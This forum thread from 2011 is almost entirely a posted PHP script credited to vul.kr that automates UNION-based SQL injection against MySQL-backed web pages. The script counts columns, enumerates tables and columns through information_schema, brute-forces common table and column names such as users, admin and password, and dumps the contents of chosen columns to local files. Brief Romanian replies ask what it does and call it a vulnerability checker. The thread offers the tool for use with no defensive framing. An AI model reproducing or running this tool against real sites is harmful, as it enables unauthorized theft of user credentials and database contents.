denjacker Posted April 28, 2011 Report Share Posted April 28, 2011 <?php//author:www.vul.krerror_reporting(0);ini_set("max_execution_time",0);ini_set("default_socket_timeout",10);$server=$argv[1];$mode=$argv[2];$database=$argv[3];$server=str_replace("\"","",$server);$num=0;if(!$server||!$mode){print_r('--------------------------Begin Code By www.vul.kr------------------------------Usage: php.exe '.$argv[0].' Url Options Database TableOptions:1 Show Union Number [MYSQL 4/5 VERSION]2 Show Tables [MYSQL 5 VERSION]3 Show Columns [MYSQL 5 VERSION]4 Show Content [MYSQL 4/5 VERSION]5 Guess Tables [MYSQL 4 VERSION]6 Guess Columns [MYSQL 4 VERSION]-------------------------------End-----------------------------------------');exit;}function str_todex($string){$num=strlen($string);for($i=0;$i<$num;$i++){$str=substr($string,$i,$i+1);$ascii=ord($str);$hex.=dechex($ascii);}$hex="0x".$hex;return $hex;}if($mode==1) {$injstr="0x5B676F6F676C656F72675D";$ins=$injstr;for($j=1;$j<=50;$j++){$expurl=$server."%09and%091=2%09UnIoN%09SeLeCt%09".$injstr."%23";echo ".."; $reponse=@file_get_contents($expurl); if(strstr($reponse,"[googleorg]")){ echo "\r\nFind Colnums Numbers: $j \r\n";break;}$injstr=$ins.",".$injstr;}$expurlps=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$data=$expurlps;$aall="";$dote=",";for($k=1;$k<=$j;$k++){$aall=$aall.$k.$dote;}$unum=substr($data.$aall,0,strlen($data.$aall)-1);$expurl="%23";$rurl=$unum.$expurl;$fp=fopen("url.txt","w");fwrite($fp,$rurl);//echo "\r\n$rurl";echo "\r\n go and see url.txt";}elseif($mode==2){if($argc<>6) {echo "\r\ninjection-url option database Union-NO Union-postion\r\n";exit;}//-----------------------------get the NO of tables------------------------------------------------------------$expurl0=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$UnIoNnum=$argv[4]+500;$data=$expurl0;$aall="";$dote=",";for($k=501;$k<=$UnIoNnum;$k++){$aall=$aall.$k.$dote;}$unum=$data.substr($aall,0,strlen($aall)-1);$replacetext="CoNcAt(0x5B676F6F676C656F72675D,count(*),0x5B2F676F6F676C656F72675D)";$expurl1.="%09FrOm%09information_schema.tables%09";$expurl1.="WhErE%09TABLE_SCHEMA=".str_todex($database)."%23";$rurl=$unum.$expurl1;$search=$argv[5]+500;$endurl=str_replace($search,$replacetext,$rurl);//---------------------------------------------------------------------------------------------$reponse1=@file_get_contents($endurl);preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse1,$matchs1);if($crack1=($matchs1[1])){$Tnum=$crack1[0];echo "\r\nFind $Tnum tables\r\n";}for($i=0;$i<$Tnum;$i++){echo "\r\n";//-----------------------------Get tables-----------------------------------------------------------$expurfirst=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$data=$expurfirst;$aall="";$dote=",";for($k=501;$k<=$UnIoNnum;$k++){$aall=$aall.$k.$dote;}$unum=substr($data.$aall,0,strlen($data.$aall)-1);$replacetxt="CoNcAt(0x5B676F6F676C656F72675D,TABLE_NAME,0x5B2F676F6F676C656F72675D)";$expurl="%09FrOm%09information_schema.tables%09";$expurl.="WhErE%09TABLE_SCHEMA=".str_todex($database)."%09limit%09$i,1%23";$rurl=$unum.$expurl;$endurl=str_replace($search,$replacetxt,$rurl);//------------------------------------------------------------------------------------------------$reponse=@file_get_contents($endurl);preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse,$matchs);if($crack=($matchs[1])){$fp=fopen("table.txt","a+");fwrite($fp,$crack[0]."\r\n");echo $crack[0]."\t";}//else{echo "Done!\r\n";break;}}}elseif($mode==3){$table=$argv[6];if($argc<>7) {echo "\r\ninjection-url option database Union-NO Union-postion tablename\r\n";exit;}//--------------------------------get count colnums------------------------------------------------------------$expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$UnIoNnum=$argv[4]+500;$data=$expurlexp;$aall="";$dote=",";for($k=501;$k<=$UnIoNnum;$k++){$aall=$aall.$k.$dote;}$unum=$data.substr($aall,0,strlen($aall)-1);$replacetx="CoNcAt(0x5B676F6F676C656F72675D,count(*),0x5B2F676F6F676C656F72675D)";$expurl2="%09FrOm%09information_schema.COLUMNS";$expurl2.="%09WhErE%09TABLE_SCHEMA=".str_todex($database)."%09and%09TABLE_NAME=".str_todex($table)."%23";$rurl=$unum.$expurl2;$search=$argv[5]+500;$endurl=str_replace($search,$replacetx,$rurl);//---------------------------------------------------------------------------------------------$reponse2=@file_get_contents($endurl);preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse2,$matchs2);if($crack2=($matchs2[1])){$Cnum=$crack2[0];echo "\r\nFind $Cnum Colnums\r\n";}for($i=0;$i<$Cnum;$i++){//--------------------------------Get Colnums------------------------------------------------------------$expurlps=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$data=$expurlps;$aall="";$dote=",";for($k=501;$k<=$UnIoNnum;$k++){$aall=$aall.$k.$dote;}$unum=substr($data.$aall,0,strlen($data.$aall)-1);$replay="CoNcAt(0x5B676F6F676C656F72675D,COLUMN_NAME,0x5B2F676F6F676C656F72675D)";$expurl="%09FrOm%09information_schema.COLUMNS";$expurl.="%09WhErE%09TABLE_SCHEMA=".str_todex($database)."%09and%09TABLE_NAME=".str_todex($table)."%09Limit%09$i,1%23";$rurl=$unum.$expurl;$search=$argv[5]+500;$endurl=str_replace($search,$replay,$rurl);//---------------------------------------------------------------------------------------------$reponse=@file_get_contents($endurl);preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse,$matchs);if($crack=($matchs[1])){$fp=fopen("column.txt","a+");fwrite($fp,$crack[0]."\r\n");echo $crack[0]."\t";}//else{echo "Down!\r\n";break;}}}//--------------------------MYSQL4.0 Guess table---------------------------------------elseif($mode==5) {if($argc<>5) {echo "\r\ninjection-url option Union-NO Union-postion \r\n";exit;}$tmptalble=array('users','user','admin','ident','adminlog','members','member','eq_users','tb_users','tbl_user','login','logging','nuke_users','admins','group_members','phpbb_users','administrator','admin_log','pass_admin','wp_users','accounts','adminlogin','auth','authenticate','authentication','account','customers','config','conf','cfg','sb_host_admin','WebAdmin','super','administrateurs','webmaster','webmasters','webuser','userinfo','userlist','sysadmins','manager','memberlist','logs','login','customer','edit','editor','administration','accounts','cms_admin','cms_admins','cms_user','cms_users','xoops_users','vbulletin_user','vb_user','user_login','user_logins','user_admin','tb_member','tb_members','tb_administrator','tb_login','tb_user','sysadmin','smf_members','smallnuke_members','site_logins','site_login','sitelogin','siteslogins','punbb_users','poll_user','phpBB2.phpbb_users','phpBB2.forum_users','phpbb_users','phorum_user','nuke_users','nuke_authors','mybb_users','mysql.user','login_admin','login_admins','login_user','login_users','jos_users','jos_joomblog_users','ipb.ibf_members','ibf_members','forum.ibf_members','fusion_users','e107_user','e107.e107_user','dbadmins','cpg132_users','chat_users','article_admin','Administratoren','administrieren','4images_users');$expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$UnIoNnum=$argv[3]+500;$data=$expurlexp;$aall="";$dote=",";for($k=501;$k<=$UnIoNnum;$k++){$aall=$aall.$k.$dote;}$unum=$data.substr($aall,0,strlen($aall)-1);$replay="0x5B676F6F676C656F72675D";$expurl="%09FrOm%09[chinapost]%23";$rurl=$unum.$expurl;$search=$argv[4]+500;$endurl=str_replace($search,$replay,$rurl);$endurl2=$endurl;//---------------------------------------------------------------------------------------------for($j=0;$j<count($tmptalble);$j++){$tb=$tmptalble[$j];$endurl=str_replace("[chinapost]",$tb,$endurl);$reponse=@file_get_contents($endurl);if(strstr($reponse,"[googleorg]")){echo "\r\nFind Table: ".$tmptalble[$j];}$endurl=$endurl2;}}//--------------------------MYSQL4.0 Guess Colnums---------------------------------------elseif($mode==6) {if($argc<>7){echo "\r\ninjection-url option Union-NO Union-Postion Choose-postion tablename \r\n";exit;}$tmpcol=array('id','uid','userid','username','cst','user','pseudo','pw','pass','password','uname','login','login_user','memeber_pass','memberpwd','login_pass','login_name','userpassword','userpw','userpwd,','member_pwd','memberpw','user_name','name','usr','adminname','admin','adminpass','adminpassword','passwd','adminpasswd','pwd','script','user_login','user_pass','login_passwort','usrname','usrpass','usr_pass','userpass','user_password','administrator','usrpw','adminpwd','adminpw','userPassword','Userlogin','Administratorzy','Administrator','pWord','passer','Passw','membres','membername','wp_users','usrs','usrnam','usrname','usrn','usernm','useradmin','user_usrnm','user_usernm','user_pword','user_pwrd','user_pwd','user_passw','user_email','user_admin','pwrd','pword','psw','passw','pass_word','pass_hash','p_word','memlogin','mempassword','members','membername','memberid','member_name','member_id','mem_pwd','mem_password','mem_passwd','mem_pass','mem_login','mail','md5hash','logins','login_username','login_user','login_pwd','auth','adminuserid','adminuser','adminemail','admin_userid','admin_user','admin_pwd','admin_password','admin_passwd','admin_pass','admin_name','account','accounts','sb_admin_name','sb_pwd');$expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$UnIoNnum=$argv[3]+500;$Gtable=$argv[6];$data=$expurlexp;$aall="";$dote=",";for($k=501;$k<=$UnIoNnum;$k++){$aall=$aall.$k.$dote;}$unum=$data.substr($aall,0,strlen($aall)-1);$replay="0x5B676F6F676C656F72675D";$expurl="%09FrOm%09".$Gtable."%23";$rurl=$unum.$expurl;$search=$argv[4]+500;$SeLeCtsearch=$argv[5]+500;$endurl=str_replace($search,$replay,$rurl);$endurl2=$endurl;//---------------------------------------------------------------------------------------------for($j=0;$j<count($tmpcol);$j++){$tb=$tmpcol[$j];$endurl=str_replace($SeLeCtsearch,$tb,$endurl);$reponse=@file_get_contents($endurl);if(strstr($reponse,"[googleorg]")){echo "\r\nFind Column: ".$tmpcol[$j];}$endurl=$endurl2;}}elseif($mode==4){$table=$argv[6];$column=$argv[7];$column2=$argv[8];if($argc<>9){echo "\r\ninjection-url option database Union-NO Union-postion tablename colnum1 colnum2\r\n";exit;}//--------------------------------Get contents count-------------------------------------------------------------$expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$UnIoNnum=$argv[4]+500;$data=$expurlexp;$aall="";$dote=",";for($k=501;$k<=$UnIoNnum;$k++){$aall=$aall.$k.$dote;}$unum=$data.substr($aall,0,strlen($aall)-1);$replacetx="CoNcAt(0x5B676F6F676C656F72675D,count(*),0x5B2F676F6F676C656F72675D)";$expurl2="%09FrOm%09$database.$table%23";$rurl=$unum.$expurl2;$search=$argv[5]+500;$endurl=str_replace($search,$replacetx,$rurl);//---------------------------------------------------------------------------------------------$reponse2=@file_get_contents($endurl);preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse2,$matchs2);if($crack2=($matchs2[1])){$Cnum=$crack2[0];echo "\r\nFind $Cnum recodes\r\n";}for($i=0;$i<$Cnum;$i++){//--------------------------------Get contents------------------------------------------------------------$expurlps=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$data=$expurlps;$aall="";$dote=",";for($k=501;$k<=$UnIoNnum;$k++){$aall=$aall.$k.$dote;}$unum=substr($data.$aall,0,strlen($data.$aall)-1);$replay="CoNcAt(0x5B676F6F676C656F72675D,".$column.",0x7C,".$column2.",0x5B2F676F6F676C656F72675D)";$expurl="%09FrOm%09$database.$table%09Limit%09$i,1%23";$rurl=$unum.$expurl;$search=$argv[5]+500;$endurl=str_replace($search,$replay,$rurl);//---------------------------------------------------------------------------------------------$reponse=@file_get_contents($endurl);preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse,$matchs);if($crack=($matchs[1])){$fp=fopen("content.txt","a+");fwrite($fp,$crack[0]."\r\n");echo $crack[0]."\t";}//else{echo "done!\r\n";break;}}}?>http://img.vul.kr/uploads/20090729/1248888141mysql-auto.txt 1 Quote Link to comment Share on other sites More sharing options...
CrashOverride Posted May 3, 2011 Report Share Posted May 3, 2011 si ce faci cu asta? Quote Link to comment Share on other sites More sharing options...
nedo Posted May 3, 2011 Report Share Posted May 3, 2011 (edited) E un script php care verifica daca este vulnerabila o baza de date.Le: Xander are dreptate, m-am exprimat gresit. De fapt testeaza daca o pagina care acceseaza o baza de date mysql 4/5 este vulnerabil la injectie sql. Edited May 3, 2011 by nedo Quote Link to comment Share on other sites More sharing options...
Xander Posted May 3, 2011 Report Share Posted May 3, 2011 o baza de date nu are cum sa fie in sine vulnerabila lol... scriptul poate fi vulnerabil sau serverul bazei de date... dar baza de date nu Quote Link to comment Share on other sites More sharing options...
